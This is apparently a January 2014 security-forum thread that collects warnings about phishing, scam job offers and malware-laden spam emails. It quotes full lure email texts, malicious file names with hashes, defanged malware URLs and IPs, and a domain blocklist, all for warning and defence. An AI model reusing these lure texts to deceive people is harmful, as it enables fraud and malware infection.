Fake Credit Report Email Messages - 2014 Jan 17
Fake Fax Message Delivery Email Messages - 2014 Jan 17
Fake Job Offer Notification Email Messages - 2014 Jan 17
Fake Account Payment Information Email Messages - 2014 Jan 17
Fake Failed Delivery Notification Email Messages - 2014 Jan 17
Fake Fax Message Delivery Email Messages - 2014 Jan 17
Fake Incoming Money Transfer Notification Email Messages - 2014 Jan 17
Fake Invoice Statement Attachment Email Messages - 2014 Jan 17
Fake Delivery Express Parcel Notification Email Messages - 2014 Jan 17
Fake Anti-Phishing Email Messages - 2014 Jan 17
Malicious Personal Pictures Attachment Email Messages - 2014 Jan 17
Fake Product Order Notification Email Messages - 2014 Jan 17
(More detail and links at the cisco URL above.)

:fear::mad: :sad:

AplusWebMaster
2014-01-20, 14:38
FYI...

Spyware attacks against U.S. bloggers ...
- http://www.welivesecurity.com/2014/01/20/vietnamese-malware-single-post-enough-to-trigger-spyware-attacks-against-u-s-bloggers-eff-claims/
20 Jan 2014 - "A single anti-government blog post is enough to trigger personalized spyware attacks from hacker groups supporting the Vietnamese communist state, which the Electronic Frontier Foundation claims* targets anti-government bloggers – even those in other countries – with malware, including its staff, and Californian activists... The new campaign, though, used highly targeted attacks aimed at specific critics of the government – including EFF staff... The -malware- was sent out as a link to a Google document, and was sent in emails tailored to targets – the activists were invited to a conference, and an Associated Press journalist was offered a white paper from Human Rights Watch..."
* https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal
Jan 19, 2014

- https://net-security.org/malware_news.php?id=2679
20.01.2014
___

PG&E SPAM - Malware distribution campaign
- https://isc.sans.edu/diary.html?storyid=17459
Last Updated: 2014-01-19 18:41:43 UTC - "Starting about 10 days or so ago, a Spam campaign began targeting Pacific Gas and Energy (PG&E), a large U.S. energy provider. PG&E has been aware of this campaign for about a week, and has informed its customers.
> http://www.pgecurrents.com/2014/01/08/pge-warns-of-scam-emails-calls/
... these emails look quite professional and the English is good. The only real issue in the email being formatting of some of the currency figures.
> https://isc.sans.edu/diaryimages/images/PGEStatement.jpg
The header revealed that it was sent from user nf@ www1 .nsalt .net using IP 212.2.230.181, most likely a compromised webmail account. Both the from and the reply-to fields are set to do_not_reply@ nf .kg, an email address that bounces. The 212.2.230.181 IP, the nf .kg domain and the nsalt .net domain - all map to City Telecom Broadband in Kyrgyzstan (country code KG)... the goal of this particular campaign seems to be malware distribution. The "click here" link in the two samples point to different places
hxxp ://s-dream1 .com/message/e2y+KAkbElUyJZk38F2gvCp7boiEKa2PSdYRj+YOvLI=/pge
hxxp ://paskamp .nl/message/hbu8N3ny7oAVfvBZrZWLSrkYv2kTbwArk3+Tspbd2Cg=/pge
Both of these links are now down, but when they were alive they both served up PGE_FullStatement_San_Francisco_94118.zip which contained a Windows executable... Virustotal has a 5/48 detection rate indicating this is most likely a Trojan Dropper:
> https://isc.sans.edu/diaryimages/images/virustotalpge.jpg ..."

- https://www.virustotal.com/en/ip-address/212.2.230.181/information/
___

Spammers buy Chrome extensions - turn them into adware
- https://www.computerworld.com/s/article/9245551/Spammers_buy_Chrome_extensions_and_turn_them_into_adware
Jan 20, 2014 - "... At least two Chrome extensions recently sold by their original developers were updated to inject ads and affiliate links into legitimate websites opened in users' browsers. The issue first came to light last week when the developer of the "Add to Feedly" extension, a technology blogger named Amit Agarwal, reported that after selling his extension late last year to a third-party, it got transformed into adware... A second developer, Roman Skabichevsky, confirmed Monday that his Chrome extension called "Tweet This Page" suffered a similar fate after he sold it at the end of November... According to the Chrome Web Store developer program policies, advertising is allowed in apps hosted in the store, but there are strict criteria for displaying ads on third-party websites..."
___

Bill Me Later Payment Spam
- http://threattrack.tumblr.com/post/73952603900/bill-me-later-payment-spam
Jan 20, 2014 - "Subjects Seen:
Thank you for scheduling a payment to Bill Me Later
Typical e-mail details:
Dear Customer,
Thank you for making a payment online! We’ve received your
Bill Me Later® payment of $1201.39 and have applied it to your account.
For more details please check attached file
Summary:
Your Bill Me Later Account Number Ending in: 0759
You Paid: $1201.39
Your Payment Date*: 01/20/2014
Your Payment Confirmation Number: 042075773771348058

Malicious File Name and MD5:
PP_03357442.zip (93C0326C3D37927E4C38C90016C7F14C)
PP_03357442.exe (2B68D8CC7CB979EA9A1405D32E30A00A)

Screenshot: https://31.media.tumblr.com/dcb80e6f244cf5c9ac9a1b1f619ca78c/tumblr_inline_mzpik5AQ2R1r6pupn.png

Tagged: bill me later, Upatre

- http://blog.dynamoo.com/2014/01/thank-you-for-scheduling-payment-to.html
20 Jan 2014 - "This -fake- Bill Me Later spam has a malicious attachment:
Date: Mon, 20 Jan 2014 14:23:08 +0000 [09:23:08 EST]
From: Bill Me Later [service@ paypal .com]
Subject: Thank you for scheduling a payment to Bill Me Later
BillMeLater
Log in here
Your Bill Me Later statement is now available!
Dear Customer,
Thank you for making a payment online! We've received your
Bill Me Later® payment of $1603.57 and have applied it to your account.
For more details please check attached file
Summary:
Your Bill Me Later Account Number Ending in: 0266
You Paid: $1603.57
Your Payment Date*: 01/20/2014
Your Payment Confirmation Number: 971892583971968191 ...

Screenshot: https://lh3.ggpht.com/-g4CABaa5Ka4/Ut1QywUpoEI/AAAAAAAACbY/NXzEDLx1S_U/s1600/billmelater.png

Attached is an archive file PP_03357442.zip which in turn contains a malicious executable PP_03357442.exe which has a VirusTotal detection rate of just 4/45*. Automated analysis tools... show an attempted connection to jatit .org on 72.9.158.240 (Colo4, US) which appears to be a legitimate (but presumably compromised) site."
* https://www.virustotal.com/en-gb/file/e6407a8ddd930055870379962e430154381a909e15e5af84d2da53ee3d8b2106/analysis/1390235463/
___

Fake WhatsApp "A friend of yours has just sent you a pic" SPAM
- http://blog.dynamoo.com/2014/01/whatsapp-friend-of-yours-has-just-sent.html
20 Jan 2014 - "This -fake- WhatsApp spam has a malicious attachment:
Date: Mon, 20 Jan 2014 06:23:28 -0500 [06:23:28 EST]
From: WhatsApp [{messages@ whatsapp .com}]
Subject: A friend of yours has just sent you a pic
Hey!
Someone you know has just sent you a pic in WhatsApp. Open attachments to see what it is.
2013 WhatsApp Inc

Screenshot: https://lh3.ggpht.com/-ogFWbF6oOwk/Ut1zdrTph5I/AAAAAAAACbo/gYz18kkrW_A/s1600/whatsapp.png

Attached to the message is a an archive file IMG9900882.zip which in turn contains a malicious exectuable IMG9900882.exe which has a VirusTotal detection rate of 20/49*... analysis gives few clues as to what the malware does, other automated analysis tools are inconclusive."
* https://www.virustotal.com/en/file/a1142f44e5add86007cf1be62d909e19032a165c57d29a61c10af009d0fcf69f/analysis/1390244298/

:mad: :fear:

AplusWebMaster
2014-01-21, 15:53
FYI...

Fake Apple Account 'Update to New SSL Servers' Phishing Scam/SPAM
- http://www.hoax-slayer.com/apple-new-ssl-servers-phishing-scam.shtml
Jan 21, 2014 - "Email purporting to be from Apple claims that the user's online access has been blocked because customers are required to update their information in order to use new ssl servers... The email is not from Apple. It is a phishing scam designed to trick recipients into giving their Apple account details and other personal and financial information to Internet criminals.
> http://www.hoax-slayer.com/images/apple-ssl-servers-scam-1.jpg
... According to an email that -appears- to come from Apple, the recipient's Apple account has been blocked until account information is updated. The email claims that Apple is implementing new SSL servers to increase customer protection and therefore all customers need to update their details or risk suspension of their accounts. The email includes a link to the "account update process". However, the message is -not- from Apple and the claim that users must update their details is a lie. Instead, the email is a phishing scam designed to steal Apple ID's and a large amount of other personal and financial information. Those who fall for the trick and click the update link in the email will be taken to a fake Apple login page as shown in the following screenshot:
> http://www.hoax-slayer.com/images/apple-ssl-servers-scam-3.jpg
... be wary of any message purporting to be from Apple that claims there is an issue with your account that needs to be rectified or you are required to perform an account update..."

... as in: DELETE.
___

Data-stealing malware targets Mac users in "undelivered courier item" attack
- http://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/
Jan 21, 2014 - "... you receive an email that claims to be a courier company that is having trouble delivering your article. In the email is a link to, or an attachment containing, what purports to be a tracking note for the item. You are invited to review the relevant document and respond so that delivery can be completed. We've seen a wide variety of courier brands "borrowed" for this purpose, including DHL, the UK's Royal Mail and even, in one bewildering case, a made-up courier company called TNS24, with its very own website... Here's what the emails looked like in this attack, with some details changed or redacted for safety:
> http://sophosnews.files.wordpress.com/2014/01/osx-fed-email-500.png?w=500&h=446
If you are a native speaker of English, you will notice that the wording of the email is clumsy and unidiomatic, and if you were to receive a message like this you might well be suspicious on those grounds alone... The link, of course, doesn't really lead to fedex .com .ch, but instead takes you to a domain name that is controlled by the attackers... If you are using a desktop browser that isn't Safari, you receive a ZIP file containing a Windows program detected by Sophos Anti-Virus as Mal/VBCheMan-C, a vague relative of the Zbot or Zeus malware. But if you are using Safari, you receive Mac malware, delivered as an Application bundle packaged inside a ZIP file. By default, on OS X 10.9.1 (the latest update to Mavericks, Apple's most recent operating system version), Safari directly downloads the file, showing you an -empty- Safari window with the icon of the downloaded file in the Dock at the bottom of the screen:
> http://sophosnews.files.wordpress.com/2014/01/osx-fed-pdf-appears-500.png?w=500&h=376
Clicking on the download button shows you what -looks- like a PDF file... There is no PDF file, as a visit to the Terminal windows quickly reveals. Safari has automatically unzipped the download, producing an Application bundle (actually just a subdirectory tree with a special structure) that has deliberately been given a PDF icon... the temptation is to click on what looks like a PDF file to see what it contains. OS X does try to advise you that you aren't opening a document, although you can argue that the warning would be more compelling if it explicitly said that you were about to "run a software program", rather than merely to "open" the file... prevention is better than cure. And that "undelivered courier item" almost certainly doesn't exist."
___

Something evil on 5.254.96.240 and 185.5.55.75
- http://blog.dynamoo.com/2014/01/something-evil-on-525496240-and-18555575.html
21 Jan 2014 - "This malware attack appears to be aimed at German speakers, and is presumably spreading through spam although I don't have a sample of the email message. What I -do- have is a nasty EXE-in-ZIP payload that masquerades as a bill or other communication from Deutsche Telekom, Vodafone, Fiducia or Volksbank. URLquery shows one such download in this example*, the victim has been directed to [donotclick]gf-58 .ru/telekom_deutschland which in turn downloads a ZIP file Rechnungsruckstande_9698169830015295.zip which in turn contains a malicious executable Mitteilung, Rechnungsruckstande 9901169820005294 Telekom Deutschland GmbH vom Januar 2014.exe which has a VirusTotal detection rate of 7/48**.
> https://lh3.ggpht.com/-icNtor0_pdM/Ut6DaRXAgGI/AAAAAAAACb4/XqfuRAlLjFU/s1600/telekom.png
The malware is downloaded from a server at 5.254.96.240 (Voxility, Romania). Sample URLs on this server according to URLquery*** and VirusTotal****... The Anubis report and ThreatExpert report show that the malware calls home to dshfyyst .ru on 185.5.55.75 (UAB "Interneto vizija", Lithunia). There are some other suspect sites on the same server which may be worth blocking (see below). All these sites are .ru domains registered to the infamous "Private Person" so there are no clues as to their ownership.
Recommended blocklist:
5.254.96.240
gf-58 .ru
uiuim .ru
okkurp .ru
gdevseesti .ru
goodwebtut .ru
mnogovsegotut .ru
185.5.55.75
gossldirect .ru
dshfyyst .ru ..."

* http://urlquery.net/report.php?id=8907792

** https://www.virustotal.com/en-gb/file/9ff1c4c75212defc5fadc096cb8436dc9eaabb3afe0e69364ce53e90dadbfabc/analysis/1390310958/

*** http://urlquery.net/search.php?q=5.254.96.240&type=string&start=2014-01-06&end=2014-01-21&max=50

**** https://www.virustotal.com/en-gb/ip-address/5.254.96.240/information/

Update: this appears to be Cridex aka Feodo: http://www.abuse.ch/?p=6713

:mad: :fear:

AplusWebMaster
2014-01-22, 15:47
FYI...

Fake PayPal Scams ...
- http://www.hoax-slayer.com/look-out-for-paypal-scam-warning-message.shtml
Jan 22, 2014 - "Message that circulates via social media and online forums warns users to watch out for an email from PayPal... PayPal is almost continually targeted by phishing scammers using a wide variety of phishing techniques... This warning message has been circulating via various social media channels as well as online forums and blogs since around May 2013. The message warns users to look out for an email from PayPal that claims that £35.50 has been taken from the recipient's PayPal account and used to pay a Skype bill... Since at least 2011 scammers have been using and reusing a phishing technique that comprises scam emails that supposedly notify recipients that a Skype TopUp payment has been made via their PayPal account. Links in the scam emails open -fake- PayPal sites that entice users to enter their PayPal login details, and - in some cases - other personal and financial information... it should also be noted that this particular phishing technique is just one among -dozens- of phishing attacks that continually target PayPal users... Because it conducts its business online and via email, PayPal is a primary target for phishing scammers. A quick rule of thumb. Genuine PayPal emails will always address you by your name, -not- via a generic greeting such as "Dear Customer". If you receive a suspected phishing scam email from PayPal you can submit it for analysis via the address listed on the PayPal website*."
* https://www.paypal.com/au/webapps/mpp/security/antiphishing-ppphishingreport
___

Sochi Olympics - Hoax threats
- http://www.reuters.com/article/2014/01/22/olympics-threat-idUSL5N0KW3RT20140122
Jan 22, 2014 - "At least five European countries' Olympic committees and the United States received letters in Russian on Wednesday making a "terrorist threat" before the Sochi Games, but Olympic chiefs said they posed no danger. Despite the assurances, the letters to committees in Italy, Hungary, Germany, Slovenia and Slovakia briefly caused alarm and underlined nervousness about security at the $50 billion event... The U.S. Olympic Committee later confirmed that it also received a letter by email. Suicide bombers killed at least 34 people in a city in southern Russia last month, Islamist militants have threatened to attack the Winter Games and security forces are hunting a woman suspected of planning a suicide bombing and of being in Sochi already..."
___

Facebook Survey Scams
- http://www.hoax-slayer.com/facebook-survey-scam-list.shtml
Jan 21, 2014 - Last:
- http://www.hoax-slayer.com/royal-caribbean-international-survey-scam.shtml
Jan 22, 2014
___

Fake NatWest Mortgage Spam
- http://threattrack.tumblr.com/post/74170286889/natwest-mortgage-spam
Jan 22, 2014 - "Subjects Seen:
Mortgage update - Completion date
Typical e-mail details:
NatWest Intermediary Solutions
Mortgage Ref number: 9080338
We are pleased to advise that we have received a mortgage completion request from the solicitor acting on the case for your customer named above. The acting solicitor has confirmed that the mortgage will complete on 22.01.2014.
For more details please check attached file.
Kind Regards
NatWest Mortgage Team

Malicious File Name and MD5:
Morg_9080338.zip (C02B5FA63331394B6ADFF54952646A16)
Morg_220114.exe (BE295E5E51F2354EF6396AFAB4225783)

Screenshot: https://31.media.tumblr.com/943447252d5a4ba04b541425281a7959/tumblr_inline_mzt3y3xdNK1r6pupn.png

Tagged: NatWest, Upatre
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Email Messages with Malicious Attachments - 2014 Jan 22
Fake Account Payment Notification Email Messages - 2014 Jan 22
Fake Application Confirmation Email Messages - 2014 Jan 22
Fake Transaction Details Notification Email Messages - 2014 Jan 22
Fake Electricity Bill Notification Email Messages - 2014 Jan 22
Fake Court Appearance Request Email Messages - 2014 Jan 22
Fake Product Order Notification Email Messages - 2014 Jan 22
Fake Travel Information Email Messages - 2014 Jan 22
Fake Product Order Email Messages - 2014 Jan 22
Fake UPS Payment Document Attachment Email Messages - 2014 Jan 22
Fake Photograph Sharing Email Messages - 2014 Jan 22
Fake Court Appearance Request Email Messages - 2014 Jan 22
Fake Account Payment Information Email Messages - 2014 Jan 22
Fake Failed Delivery Notification Email Messages - 2014 Jan 22
Fake Company Complaint Email Messages - 2014 Jan 22
Fake Fax Message Delivery Email Messages - 2014 Jan 22
Fake Fax Delivery Email Messages - 2014 Jan 22
Fake Payroll Invoice Email Messages - 2014 Jan 22
Malicious Personal Pictures Attachment Email Messages - 2014 Jan 22
Fake German Payment Form Attachment Email Messages - 2014 Jan 22
(More detail and links at the cisco URL above.)

:fear: :mad:

AplusWebMaster
2014-01-23, 16:11
FYI...

Fake "Legal Business Proposal" SPAM ...
- http://blog.dynamoo.com/2014/01/legal-business-proposal-spam-has.html
23 Jan 2014 - "This email looks like it should be an advanced fee fraud, but instead it comes with a malicious attachment. I love the fact that this is a Legal Business Proposal as opposed to an Illegal one.
Date: Thu, 23 Jan 2014 12:45:11 +0000 [07:45:11 EST]
From: Webster Bank [WebsterWeb-LinkNotifications@ WebsterBank .com]
Subject: Legal Business Proposal
Hello, I'm Norman Chan Tak-Lam, S.B.S., J.P, Chief Executive, Hong Kong Monetary Authority (HKMA).
I have a Business worth $47.1M USD for you to handle with me.
Detailed scheme of business can be seen in the attached file.

Attached is a file business-info.zip which in turn contains a malicious executable business-info.exe with a VirusTotal detection rate of 16/49*. Automated analysis tools... show attempted connections to dallasautoinsurance1 .com on 38.102.226.239 and wiwab .com on 38.102.226.82. Both those IPs are Cogent Communications ones that appear to be rented out to a small web hosting firm called HostTheName .com. For information only, that host has these other IPs in the same range:
38.102.226.82
38.102.226.5
38.102.226.7
38.102.226.10
38.102.226.12
38.102.226.14
38.102.226.17
38.102.226.19
38.102.226.21 "
* https://www.virustotal.com/en-gb/file/61e951a6d18f96539bf7ad19cf951c9d397e6b45b905adf431f7981a54b59be4/analysis/1390482190/

- https://www.virustotal.com/en/ip-address/38.102.226.82/information/
___

Mint.Com.Uk 'Minimum Credit Card Payment Due' Phish
- http://www.hoax-slayer.com/mint-credit-card-payment-due-phishing.shtml
Jan 23, 2014 - "Message, which pretends to be from UK based credit card provider Mint, claims that the recipient's minimum credit card payment is due and advises that the latest bill can be found in an attached file. The email is -not- from Mint. It is a -phishing- scam designed to trick recipients into divulging their account login details to cybercriminals... According to this message, which purports to be from UK credit card provider Mint, the recipient's minimum credit card payment is now due. The message instructs the recipient to open an attached file to view the latest Mint credit card bill. However, the email is not from Mint and the attachment does not contain a credit card bill. Instead, the email is a typical phishing scam designed to trick Mint customers into giving account login details to cybercriminals. Those taken in by the email will find that clicking the attachment loads a html file in their browser. The file contains a link supposedly leading to the credit card bill. However, clicking the link opens a fraudulent website that asks users to supply their account login details, ostensibly to access the "bill". However, users will never reach the supposed bill. They have instead sent their account login details to criminals who can then use it to hijack their accounts, steal information therein, and conduct further fraud..."
___

Gateway.gov.uk Spam
- http://threattrack.tumblr.com/post/74280913157/gateway-gov-uk-spam
Jan 23, 2014 - "Subjects Seen:
Your Online Submission for Reference 435/GB1678208 Could not process
Typical e-mail details:
The submission for reference 435/GB1678208 was successfully received and was not processed.
Check attached copy for more information.

Malicious File Name and MD5:
GB1678208.zip (1BD4797C93A4837777397CE9CB13FC8C)
GB001231401.exe (05FB8AD05E87E12F5E6E4DAE20168194)

Screenshot: https://31.media.tumblr.com/efe7c609820416483d66a4d348eababb/tumblr_inline_mzv11lghEd1r6pupn.png

Tagged: UK Government, Upatre

:fear: :mad:

AplusWebMaster
2014-01-24, 15:01
FYI...

Fake 'Customer Service Center' malware Emails
- http://www.hoax-slayer.com/customer-service-center-malware-emails.shtml
Jan 24, 2014 - "Email claiming to be from the "Customer Service Center" informs recipients that an order has been received and invites them to click a link to find out more about the order.
Brief Analysis: The email is not from any legitimate customer service center. The email is designed to trick users into installing a malicious file on their computer. Clicking the link in the email downloads a .zip file that contains a malware .exe file...
Example:
Subject: Customer Service Center
Hello, Customer
We have got your order and we will process it for 3 days.
You can find specification of the order:
[Link to .zip file removed]
Best regards
Customer Service Center

... The message makes no effort to identify either the company that supposedly sent the message or the product that the recipient supposedly ordered. The message is fraudulent and was not sent by any legitimate customer service center. The goal of the criminals who sent the email is to trick the recipient into downloading and installing malware... Details in different incarnations of the malware emails may vary. Some may claim to be from the "Client Management Department" rather than the "Customer Service Center"..."
___

Fake Amazon Local Spam
- http://threattrack.tumblr.com/post/74407933494/amazon-local-spam
Jan 24, 2014 - "Subjects Seen:
Fwd: Your order report id 2531
Typical e-mail details:
Hi,
Thank you for your order. We ll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.com.
Order Details
Order DA6220062 Placed on December 11, 2013
Order details and invoice in attached file.

Malicious File Name and MD5:
report.creditcard2735.zip (333794D9592CE296A6FE15CDF58756EA)
report.9983.exe (3B81614E62963AC5336946B87F9487FE)

Screenshot: https://31.media.tumblr.com/747295f5d77e9ee97623058f2135eeec/tumblr_inline_mzx8bt1SLW1r6pupn.png

Tagged: Amazon Local, Androm

:fear: :mad:

AplusWebMaster
2014-01-25, 12:51
FYI...

Fake "MVL Company" job offer
- http://blog.dynamoo.com/2014/01/mvl-company-fake-job-offer.html
25 Jan 2014 - "This job offer is a -fake- and in reality probably involves money laundering or handling stolen goods:
From: Downard Bergstrom [downardkrjbergstrom@ outlook .com]
Subject: Longmore
Date: Fri, 24 Jan 2014 18:52:49 +0000
Hello,
Today our Company, MVL Company, is in need of sales representatives in United Kingdom.
Our Company deals with designer goods and branded items. We've been providing our customers with exclusive products for more than five years, and we believe that the applicant for the position must have great communication skills, motivation, desire to earn money and will to go up the ladder. All charges related to this opening are covered by the Company. Your main duties include administrative support on orders and correspondence, controlling purchase orders and expense reports.
Part-time job salary constitutes 460GBP a week.
Full-time job is up to 750GBP per week .
Plus we have bonus system for the best workers!
To apply for the vacancy or to get more details about it, please email us directly back to this email.
Hope to hear from you soon!
Best regards,
Downard Bergstrom

The spam is somewhat unusual in that it addresses me by my surname, indicating that the email data might have been stolen from a data breach (Adobe perhaps). The email originates from a free Microsoft Outlook .com account and gives no clues as to its real origins. A look at Companies House Webcheck confirms that there is no company of this exact name, although there are several innocent companies with similar names.
Avoid."

:fear: :mad:

AplusWebMaster
2014-01-27, 14:18
FYI...

Fake Voice Message contains trojan in attachment
- http://blog.mxlab.eu/2014/01/27/voice-message-from-unknown-xxx-xxx-xxxx-contains-trojan-in-attached-zip-file/
Jan 27, 2014 - "... intercepted a new trojan distribution campaign by email with the subject Voice Message from Unknown (xxx-xxx-xxxx) – where x is replaced by a phone number. This email is sent from the spoofed address “Unity Messaging System <Unity_UNITY5@ xxx .xxx>”and has the following very short body (where x is replaced by phone number):
From: xxx-xxx-xxxx
The attached ZIP file has the name VoiceMail.zip and contains the 18 kB large file VoiceMail.exe. At the time of writing, 0 of the 50 AV engines did detect the trojan at Virus Total. Use the Virus Total* permalink and Malwr** permalink for more detailed information..."
* https://www.virustotal.com/en/file/e4f11d9a6515323165e2427fe0032bf29ee6ae7a0144b79f7f9dba64df8a6fba/analysis/

** https://malwr.com/analysis/ZjU0NzBlZDFjNTZkNDQ5MmIyYjUyMzFjMGMxOTBkMmM/
___

Fake "Carnival Cruise Line Australia" job offer
- http://blog.dynamoo.com/2014/01/carnival-cruise-line-australia-fake-job.html
27 Jan 2014 - "This -fake- job offer does NOT come from Carnival Cruise lines:
From: Mrs Vivian Mrs Vivian carnjob80@ wp .pl
Date: 27 January 2014 09:59
Subject: JOB ID: AU/CCL/AMPM/359/14-00
Signed by: wp.pl
Carnival Cruise Line Australia
15 Mount Street North Sydney
NSW 2060, Australia
Tel (2) 8424 88000
http ://www .carnival .com .au/
http ://www .carnivalaustralia .com/
carnivalcareer@ globomail .com
JOB ID: AU/CCL/AMPM/359/14-00
What is your idea of a great career? Is it a job that allows you to travel to beautiful destinations on a spectacular floating resort, being part of a multi-cultural team with co-workers from more than 120 different nationalities? Or is it a job that allows you to earn great money while you learn, grow and fulfill your dreams and career ambitions?
It’s Carnival Cruise Line policy not to discriminate against any employee or applicant for employment because of RACE, COLOR, RELIGION, SEX, NATIONAL ORIGIN, AGE, DISABILITY, MARITAL OR VETERAN STATUS.
PLEASE NOTE THESE FOLLOWING:
Employment Type: Full-Time/Part-Time
Salary: USD $45,000/ USD $125,000 per annual
Preferred Language of Resume/Application: English
Type of work: Permanent / Temporary
Status: All Vacancies
Job Location: Australia
Contract Period: 6 Months, 1 Year, 2 Years and 3 Years
Visa Type: Three Years working permit
The management will secure a visa/working permit for any qualified applicant. VISA FEE, ACCOMMODATION & FLIGHT TICKET will be paid by the company
We have more than 320 different positions available, interested applicants should forward their RESUME/CV or application letter to Mrs Vivian Oshea via email on (carnivalcareer@ globomail .com) so we can forward the list of positions available and our employment application form
Email: carnivalcareer@ globomail .com
Note: Applicants from AMERICA, EUROPE, ASIAN, CARIBBEAN and AFRICA can apply for these vacancies.
Regards
Management
Carnival Cruise Line Australia
carnivalcareer@ globomail .com

Despite the appearance of Carnival's actual web sites in the email, the reply address is NOT a genuine Carnival address and is instead a free email account. The email actually originates from 212.77.101.7 in Poland. The basic idea behind this scam is to offer a job and then charge the applicant for some sort of processing fees or police check or come up with some other reason why the applicant needs to pay money. Once the money has been taken (and perhaps even the victim's passport or other personal documents stolen) then the job offer will evaporate. More information on this type of scam can be found here* and here**."
* http://www.cruiseshipjobs.com/cruise-ship-job-scams.htm

** http://www.hoax-slayer.com/disney-cruise-line-job-offer-scam.shtml
___

Fake "Your FED TAX payment" SPAM
- http://blog.dynamoo.com/2014/01/your-fed-tax-payment-spam.html
27 Jan 2014 - "This -fake- "Tax payment" spam comes with a malicious attachment:
Date: Mon, 27 Jan 2014 14:24:42 +0100 [08:24:42 EST]
From: "TaxPro_PTIN@ irs .gov" [TaxPro_PTIN@ irs .gov]
Subject: Your FED TAX payment ( ID : 34KIRS821217111 ) was Rejected
*** PLEASE DO NOT RESPOND TO THIS EMAIL ***
Your federal Tax payment (ID: 34KIRS821217111), recently sent from your checking account was returned by the your financial institution.
For more information, please download notification, using your security PIN 55178.
Transaction Number: 34KIRS821217111
Payment Amount: $ 9712.00
Transaction status: Rejected
ACH Trace Number: 768339074172506
Transaction Type: ACH Debit Payment-DDA
Internal Revenue Service, Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785.

Screenshot: https://lh3.ggpht.com/-UNIXkf1KrEo/UuZ_8WP-v1I/AAAAAAAACc8/ObemHBUxulA/s1600/irs.png

Attached is a file Tax payment.zip which in turn contains a malicious executable Tax payment.exe which has a VirusTotal detection rate of 11/50*. Automated analysis by Malwr is inconclusive, other analysis tools are currently down or under DDOS at the moment.
* https://www.virustotal.com/en-gb/file/97a5412374a70610c9ed83eb4e202b0e8653384c3c8372bc63137c3a14e8fe0b/analysis/1390837447/
___

TNT Courier Service Spam
- http://threattrack.tumblr.com/post/74723096757/tnt-courier-service-spam
Jan 27, 2014 - "Subjects Seen:
TNT UK Limited - Package tracking 525933498011
Typical e-mail details:
TNT COURIER SERVICE (TCS)
Customer/Delivery Services Department
Central Pk Est/Mosley Rd, Trafford Park
Manchester, M17 1TT UK.
DETAILS OF PACKAGE
Reg order no: 525933498011
Your package have been picked up and is ready for dispatch.
Connote # : 525933498011
Service Type : Export Non Documents - Intl
Shipped on : 25 Jan 13 00:00
Order No : 4134172
Status : Driver’s Return Description : Wrong Address
Service Options: You are required to select a service option below.
The options, together with their associated conditions

Malicious File Name and MD5:
Label_525933498011.zip (58985CC9AA284309262F4E59BC36E47A)
Label_27012014.exe (E0595C4F17056E5599B89F1F9CF52D83)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9745ecae0aa5ea25ce90ec5df697f5d4/tumblr_inline_n02cy8Jn4u1r6pupn.png

Tagged: TNT Courier Service, Upatre
___

Fake "Skype Missed voice message" SPAM
- http://blog.dynamoo.com/2014/01/skype-missed-voice-message-spam.html
27 Jan 2014 - "This -fake- Skype email has a malicious attachment:
Date: Mon, 27 Jan 2014 19:37:11 +0300 [11:37:11 EST]
From: Administrator [docs1@ victimdomain .com]
Subject: Skype Missed voice message
Skype system:
You have received a voice mail message.
Date 01/27/2014
Message length is 00:01:18.

Attached to the email message is an archive file Skype-message.zip which in turn contains a malicious executable Voice_Mail_Message.exe which has a VirusTotal detection rate of 13/49*. Malwr reports** that the malware calls home to rockthecasbah .eu on 64.50.166.122 (LunarPages, US). This server has been compromised before and I recommend you -block- traffic to it."
* https://www.virustotal.com/en/file/ba438b657c3a0efa1af1cdb7ae901a9e7778b949e91ae4460f3c97a36ae49836/analysis/1390858228/

** https://malwr.com/analysis/MzY1NTdiODY5M2MwNDcxZWEwMzdjZmYwMWM1NzIwMDg/

- http://threattrack.tumblr.com/post/74739263432/skype-missed-message-spam
Jan 27, 2014 - "Subjects Seen: Skype Missed voice message..."
Malicious File Name and MD5:
Skype-message.zip (79FB2E523FE515A6DAC229B236F796FF)
Voice_Mail_Message.exe (6E4857C995699C58D9E7B97BFF6E3EE6)

Tagged: Skype, Upatre

:fear::fear: :mad:

AplusWebMaster
2014-01-28, 12:25
FYI...

Fake Facebook 'Account Verification' Scam/SPAM
- http://www.hoax-slayer.com/facebook-account-verification-2014-scam.shtml
Jan 28, 2014 - "Message purporting to be from the "Facebook Verification Team" claims that users must verify their profiles by March 15th 2014 to comply with the SOPA and PIPA Act. The message is a -scam- and -not- from any official Facebook Verification Team. Those who follow the link will be tricked into installing a rogue Facebook app and participating in -bogus- online surveys. Some variants may attempt to trick users into divulging their Facebook email address and password to criminals. Example:
Warning: Announcement from Facebook Verification Team:
All profiles must be verified before 15th March 2014 to
avoid scams under SOPA and PIPA Act.
Verify your Account by steps below
Invite your friends.
> http://www.hoax-slayer.com/images/facebook-account-verfication-2014-1.jpg
According to a message currently moving round Facebook, all users must verify their profiles by March 15th 2014 in order to comply with the SOPA and PIPA Act. The message, which comes in the form of a graphic, claims to be an announcement from the "Facebook Verification Team". Users are instructed to click an "Invite your Friends" button to begin the verification process... Users who fall for the ruse and click the button will first be asked to give a Facebook application permission to access their details. Once installed, this rogue app will spam out more fake messages in the name of the user. Victims will then be taken to another fake page where they are again told that that they must verify their account by clicking a further link. However, clicking the link takes them to various survey pages or tries to entice them to sign up for online games. Many of the surveys claim that users must provide their mobile phone number to enter in a prize draw. But, by giving out their number, users are actually signing up for very expensive SMS "subscriptions" charged at several dollars per message sent. Other surveys may ask victims to provide personal and contact information that will later be shared with third parties and used to inundate them with junk mail, emails, phone calls and text messages. The scammers responsible for the bogus "verification" messages will earn commissions via dodgy affiliate marketing systems each and every time a person participates in a survey or provides their personal information in an online "offer". Reports indicate that some versions of the scam may try to trick victims into divulging their account login details to criminals. The criminals can then -hijack- the compromised accounts and use them to distribute further scam messages..."
___

Fake RingCentral Fax msg SPAM
- http://blog.dynamoo.com/2014/01/this-fake-ringcentral-fax-spam-has.html
28 Jan 2014 - "This -fake- RingCentral fax spam has a malicious attachment:
Date: Tue, 28 Jan 2014 14:28:24 +0000 [09:28:24 EST]
From: Sheila Wise [client@ financesup .ru]
Subject: New Fax Message on 01/22/2013
You Have a New Fax Message
From: (691) 770-2954
